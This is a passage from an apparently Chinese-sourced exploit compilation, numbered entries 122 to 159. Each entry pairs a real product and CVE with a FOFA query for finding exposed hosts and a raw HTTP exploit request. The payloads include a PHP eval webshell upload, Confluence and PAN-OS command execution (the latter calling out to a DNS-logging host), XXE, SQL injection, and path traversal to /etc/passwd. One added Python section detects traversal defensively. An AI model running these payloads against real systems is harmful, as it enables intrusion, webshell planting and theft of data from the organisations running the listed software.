Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart S200 management platform: SQL injection via /importexport.php
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
+ I* p6 M3 D4 G% n- YCVE-2024-2330  A: s+ d& c" e! g+ G: c/ M4 R
Netentsec NS-ASG Application Security Gateway 6.3版本
! ~; F& o! D+ t6 h2 F1 TFOFA:app="网康科技-NS-ASG安全网关"
6 O1 F9 p! f& }- Z+ pPOST /protocol/index.php HTTP/1.1
. l0 }/ y( C& f' i8 c) K$ s1 jHost: x.x.x.x$ b# M% |, ~$ \/ u- h3 h
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
; U  c- h1 a( E* }6 P2 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- N0 A: Y3 }9 N  _: CAccept: */*7 U$ _- D' p( M" z; ]8 A9 R# T& f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( c* h, K1 @+ k( l. O* iAccept-Encoding: gzip, deflate
: J0 I. K: Q" R+ RSec-Fetch-Dest: empty
- G, {% p# N/ b% T6 OSec-Fetch-Mode: cors
4 D: s# @1 H3 x% p8 t% U1 M3 b0 {! `Sec-Fetch-Site: same-origin- e- F4 c; B. Y
Te: trailers
" |* b6 ]7 K/ j( W5 o0 E+ DConnection: close
7 F0 B9 M) |. J8 ~  y% C! E1 x9 JContent-Type: application/x-www-form-urlencoded# Y, O6 A. Z% U. O' O
Content-Length: 263
( Y& Q3 j1 |, ?! b0 J6 a- E
3 _6 }% I. H7 J5 t0 h$ e2 ujsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
" D0 w# `( C+ R8 W, a" ?) G& M  l  @  D
  a; F# M+ U* r6 O9 e
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communication command and dispat­ch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

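Entries 126, 129 (step 2), 132 (the CVE-2024-27199 paths) and 147 are the same defect seen from outside: a `..` segment, sometimes percent-encoded, that the server joins onto a directory before checking where the result lands. As an added example that is not part of the original compilation, the Python below shows the check a static-file handler should make (decode and normalise first, then compare against the root) and a log-side detector that flags traversal in decoded paths and query values. STATIC_ROOT, the function names and the sample request targets are this example's own assumptions, modelled on the request lines in this list.

```python
"""Traversal checks for a static-file handler and for access-log review.

Added example, not part of the original compilation. STATIC_ROOT, the
function names and the sample request targets are this example's own.
"""
import posixpath
from urllib.parse import unquote, urlsplit, parse_qsl

STATIC_ROOT = "/srv/www/static"          # assumed directory the handler serves


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%252e -> %2e -> .), bounded, and unify slashes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def escapes_root(root: str, relative: str) -> bool:
    """True when joining `relative` onto `root` resolves outside `root`."""
    root = root.rstrip("/")
    joined = posixpath.normpath(posixpath.join(root, relative.lstrip("/")))
    return not (joined == root or joined.startswith(root + "/"))


def resolve_static(root: str, url_path: str, prefix: str = "/static/"):
    """Map a request path under `prefix` to a file under `root`; None means refuse."""
    decoded = decode_fully(url_path)
    if not decoded.startswith(prefix):
        return None
    relative = decoded[len(prefix):]
    if escapes_root(root, relative):
        return None
    return posixpath.normpath(posixpath.join(root, relative))


def traversal_findings(request_target: str) -> list:
    """Flag '..' segments in the decoded path or in any query parameter value."""
    findings = []
    parts = urlsplit(request_target)
    if ".." in decode_fully(parts.path).split("/"):
        findings.append(("path", parts.path))
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if ".." in decode_fully(value).split("/"):
            findings.append((key, value))
    return findings
```

Run traversal_findings over the request-target column of an access log; resolve_static returning None is the signal to answer 404 instead of opening the file. Decoding is bounded to three rounds so a deliberately deep encoding cannot turn the check into a loop, and backslashes are folded into slashes before normalisation because the Windows case in entry 147 would otherwise pass posixpath untouched.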
148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected models: TBK DVR-4104, TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

The same request as a raw POST. The mdc value below decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The file is stored under the client-supplied name: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS / Masa CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote in contenthistid breaks the query and surfaces a database error; entry 187 below gives the time-based form of the same bug.

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
